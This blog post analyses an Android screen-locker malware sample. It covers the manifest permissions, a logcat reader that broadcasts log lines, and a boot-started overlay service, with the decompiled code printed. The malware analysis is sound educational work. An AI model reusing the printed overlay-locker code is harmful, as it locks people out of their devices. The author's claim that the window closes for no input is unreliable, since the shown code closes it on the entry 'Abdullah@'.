I found this malware sample from malwareBazaar.
SHA-256 Hash: 5251a356421340a45c8dc6d431ef8a8cbca4078a0305a87f4fbd552e9fc0793e
When we open the application we are greeted with a window that looks like
Note: We cant close this window
Lets dive into APK Analysis with inspecting Android Manifest.xml
There are 2 suspicious permissions to keep in mind
-
android.permission.SYSTEM_ALERT_WINDOW
This permission allows an app to create windows
-
android.permission.WAKE_LOCK
allows your app to keep the device awake, even when the device is in sleep mode
Lets dive into Main Activity
Two important things to notice is
ADRTLogCatReader.onContext(this, "com.aide.ui");
startService(new Intent(this, Class.forName("com.XPhantom.id.MyService")));
If we look into ADRTLogCatReader, we could see a suspicious code
public void run() {
try {
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("logcat -v threadtime").getInputStream()), 20);
while (true) {
String readLine = bufferedReader.readLine();
if (readLine == null) {
return;
}
ADRTSender.sendLogcatLines(new String[]{readLine});
}
} catch (IOException e) {
}
}
We could a malicious command getting executed during Runtime. The command logcat -v threadtime
can give details like date, invocation time, priority, tag, PID, and TID of the thread issuing the message.
Now another suspicious code is this line ADRTSender.sendLogcatLines(new String[]{readLine});
where the details from our logcat is passed as argument.
If we look into sendLogcatLines()
public static void sendLogcatLines(String[] strArr) {
Intent intent = new Intent();
intent.setPackage(debuggerPackageName);
intent.setAction("com.adrt.LOGCAT_ENTRIES");
intent.putExtra("lines", strArr);
context.sendBroadcast(intent);
}
We could see that our logs is sent to an app whose package name was defined in MainActivity (ie com.aide.ui
) using intents.
Now lets look for the reason why window is there (and why not closable).
Since no other code other than invoking the service was called, lets look into the service implementation and yes we get the reason.
public void onCreate() {
ADRTLogCatReader.onContext(this, "com.aide.ui");
this.windowManager = (WindowManager) getSystemService("window");
this.myView = (ViewGroup) ((LayoutInflater) getSystemService("layout_inflater")).inflate(C0000R.layout.main, (ViewGroup) null);
this.chatHead = new ImageView(this);
this.chatHead.setImageResource(C0000R.drawable.ic_launcher);
this.f0e1 = (EditText) this.myView.findViewById(C0000R.C0001id.mainEditText1);
((Button) this.myView.findViewById(C0000R.C0001id.mainButton1)).setOnClickListener(new View.OnClickListener(this) { // from class: com.XPhantom.id.MyService.100000000
/* renamed from: this$0 */
private final MyService thiss;
{
this.thiss = this;
}
@Override // android.view.View.OnClickListener
public void onClick(View view) {
if (this.thiss.f0e1.getText().toString().equals("Abdullah@")) {
this.thiss.windowManager.removeView(this.thiss.myView);
try {
this.thiss.context.startService(new Intent(this.thiss.context, Class.forName("com.XPhantom.id.MyService")));
return;
} catch (ClassNotFoundException e) {
throw new NoClassDefFoundError(e.getMessage());
}
}
this.thiss.f0e1.setText("");
}
});
WindowManager.LayoutParams layoutParams = new WindowManager.LayoutParams(-2, -2, 2002, 1, -3);
layoutParams.gravity = 17;
layoutParams.x = 0;
layoutParams.y = 0;
new View(this).setBackgroundColor(872349696);
this.windowManager.addView(this.myView, layoutParams);
}
We could understand that this window is programmed not to close for any input provided in the Editbox.
Another important thing to note is that this window open even if we didnt open the app and it opens when we turn on our phone after power-off and the reason for this is a BroadcastReceiver that calls the service for the intent android.intent.action.BOOT_COMPLETED
.
Ending Note
This was a fun malware to look into and I would recommend those who are getting started in Android Reversing / Malware Analysis to started with this sample.
Top comments (1)
[[..Pingback..]]
This article was curated as a part of #89th Issue of Software Testing Notes Newsletter.
Web: softwaretestingnotes.com